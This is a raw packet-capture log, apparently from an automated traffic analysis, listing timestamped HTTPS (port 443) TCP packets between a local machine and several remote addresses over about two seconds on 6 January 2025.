                                                            Jan 6, 2025 16:53:48.466548920 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.466612101 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.466934919 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.466989994 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.467056036 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.467061996 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.478760958 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.478804111 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.478838921 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.478878975 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.478884935 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.478893042 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.478931904 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.479046106 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.479046106 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.479054928 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.479187012 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.479219913 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.479232073 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.479235888 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.479276896 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.479286909 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.498820066 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.499088049 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.499123096 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.499994993 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.500066042 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.500566959 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.500622034 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.500703096 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.500710011 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.514873028 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.530025959 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.530031919 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.546024084 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.571079969 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.571124077 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.571254015 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.571260929 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.571325064 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.571378946 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.571439028 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.571471930 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.571476936 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.571481943 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.571517944 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.571521997 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.571559906 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.571609020 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.571614027 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.572117090 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.572149992 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.572164059 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.572168112 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.572208881 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.572212934 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.572813034 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.572845936 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.572856903 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.572861910 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.572901011 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.572905064 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.572976112 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.573020935 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.573020935 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.573029995 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.573064089 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.573709011 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.573791027 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.573821068 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.573832989 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.573837996 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.573863983 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.573882103 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.573909998 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.574141026 CET49759443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.574150085 CET44349759104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.605086088 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:48.605125904 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.605197906 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:48.606329918 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:48.606347084 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.614196062 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.614255905 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.614290953 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.614310980 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.614324093 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.614363909 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.614372015 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.614411116 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.614445925 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.614453077 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.614459038 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.614492893 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.614499092 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.614994049 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.615026951 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.615052938 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.615058899 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.615119934 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.615125895 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.616908073 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.616964102 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.616988897 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.617008924 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.617013931 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.617022991 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.617064953 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.617073059 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.617110014 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.617116928 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.617129087 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.617172956 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.617181063 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.617779016 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.617835045 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.617840052 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.621615887 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.621675014 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.621680975 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.624850988 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.624876022 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.624953032 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.625132084 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:48.625149012 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:48.661916018 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.663039923 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.702085018 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.702095985 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.702128887 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.702142000 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.702152014 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.702159882 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.702167034 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.702202082 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.702231884 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.707438946 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.707736015 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.707777977 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.707801104 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.707808018 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.707839012 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.707849979 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.707854986 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.707899094 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.707906961 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.707971096 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.707998037 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.708009958 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.708014011 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.708050013 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.708055973 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.708106041 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.708133936 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.708146095 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.708149910 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.708188057 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.708189964 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.708225012 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.708262920 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.708266973 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.708295107 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.708332062 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.708337069 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.708786011 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.708834887 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.708839893 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.712153912 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.712183952 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.712214947 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.712219000 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.712263107 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.712266922 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.712328911 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.712377071 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.712408066 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.712418079 CET44349760104.17.25.14192.168.2.4
                                                            Jan 6, 2025 16:53:48.712460041 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.712479115 CET49760443192.168.2.4104.17.25.14
                                                            Jan 6, 2025 16:53:48.787672997 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.787692070 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.787904024 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.787914991 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.787964106 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.789961100 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.789977074 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.790036917 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.790044069 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.790086031 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.790759087 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.790775061 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.790832996 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.790839911 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.790882111 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.791142941 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.791198015 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:48.791203976 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.791244984 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.791465998 CET49761443192.168.2.4151.101.66.137
                                                            Jan 6, 2025 16:53:48.791480064 CET44349761151.101.66.137192.168.2.4
                                                            Jan 6, 2025 16:53:49.059427977 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.059680939 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.059704065 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.060561895 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.060641050 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.060956001 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.061009884 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.061086893 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.061094999 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.106739998 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.106991053 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.107007980 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.107996941 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.108057022 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.108457088 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.108514071 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.108638048 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.108648062 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.109581947 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.150234938 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.205562115 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.205605030 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.205641985 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.205652952 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.205667019 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.205701113 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.205708027 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.205773115 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.205811977 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.205817938 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.206391096 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.206453085 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.206459045 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.210333109 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.210367918 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.210393906 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.210402012 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.210437059 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.210443020 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.254345894 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.255650043 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.255763054 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.255795002 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.255812883 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.255826950 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.255862951 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.255871058 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.255877018 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.255918980 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.256186008 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.256233931 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.256278992 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.256284952 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.260313034 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.260340929 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.260379076 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.260386944 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.260447979 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.292808056 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.292927027 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.292964935 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.293001890 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.293026924 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.293073893 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.293080091 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.293520927 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.293556929 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.293556929 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.293566942 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.293607950 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.293613911 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.293713093 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.293740034 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.293756962 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.293765068 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.293802023 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.294398069 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.294478893 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.294507980 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.294517994 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.294526100 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.294559002 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.294562101 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.294569969 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.294612885 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.294626951 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.295430899 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.295464039 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.295471907 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.295480013 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.295517921 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.295521021 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.295531988 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.295577049 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.295578957 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.295627117 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.347635984 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.347820044 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.347904921 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.347923040 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.348032951 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.348078966 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.348084927 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.348447084 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.348474979 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.348501921 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.348506927 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.348550081 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.348555088 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.348570108 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.348611116 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.502044916 CET49763443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.502074957 CET44349763104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.502608061 CET49762443192.168.2.4104.18.95.41
                                                            Jan 6, 2025 16:53:49.502639055 CET44349762104.18.95.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.513525963 CET49764443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.513564110 CET44349764104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.513652086 CET49764443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.513989925 CET49764443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.514003038 CET44349764104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.529112101 CET49765443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.529146910 CET44349765104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.529218912 CET49765443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.529620886 CET49765443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.529637098 CET44349765104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.978827953 CET44349764104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.979053974 CET49764443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.979074001 CET44349764104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.979365110 CET44349764104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.979639053 CET49764443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:49.979691029 CET44349764104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:49.979752064 CET49764443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:50.001218081 CET44349765104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:50.001425028 CET49765443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:50.001444101 CET44349765104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:50.001724958 CET44349765104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:50.001976967 CET49765443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:50.002032995 CET44349765104.18.94.41192.168.2.4
                                                            Jan 6, 2025 16:53:50.002072096 CET49765443192.168.2.4104.18.94.41
                                                            Jan 6, 2025 16:53:50.027328014 CET44349764104.18.94.41192.168.2.4
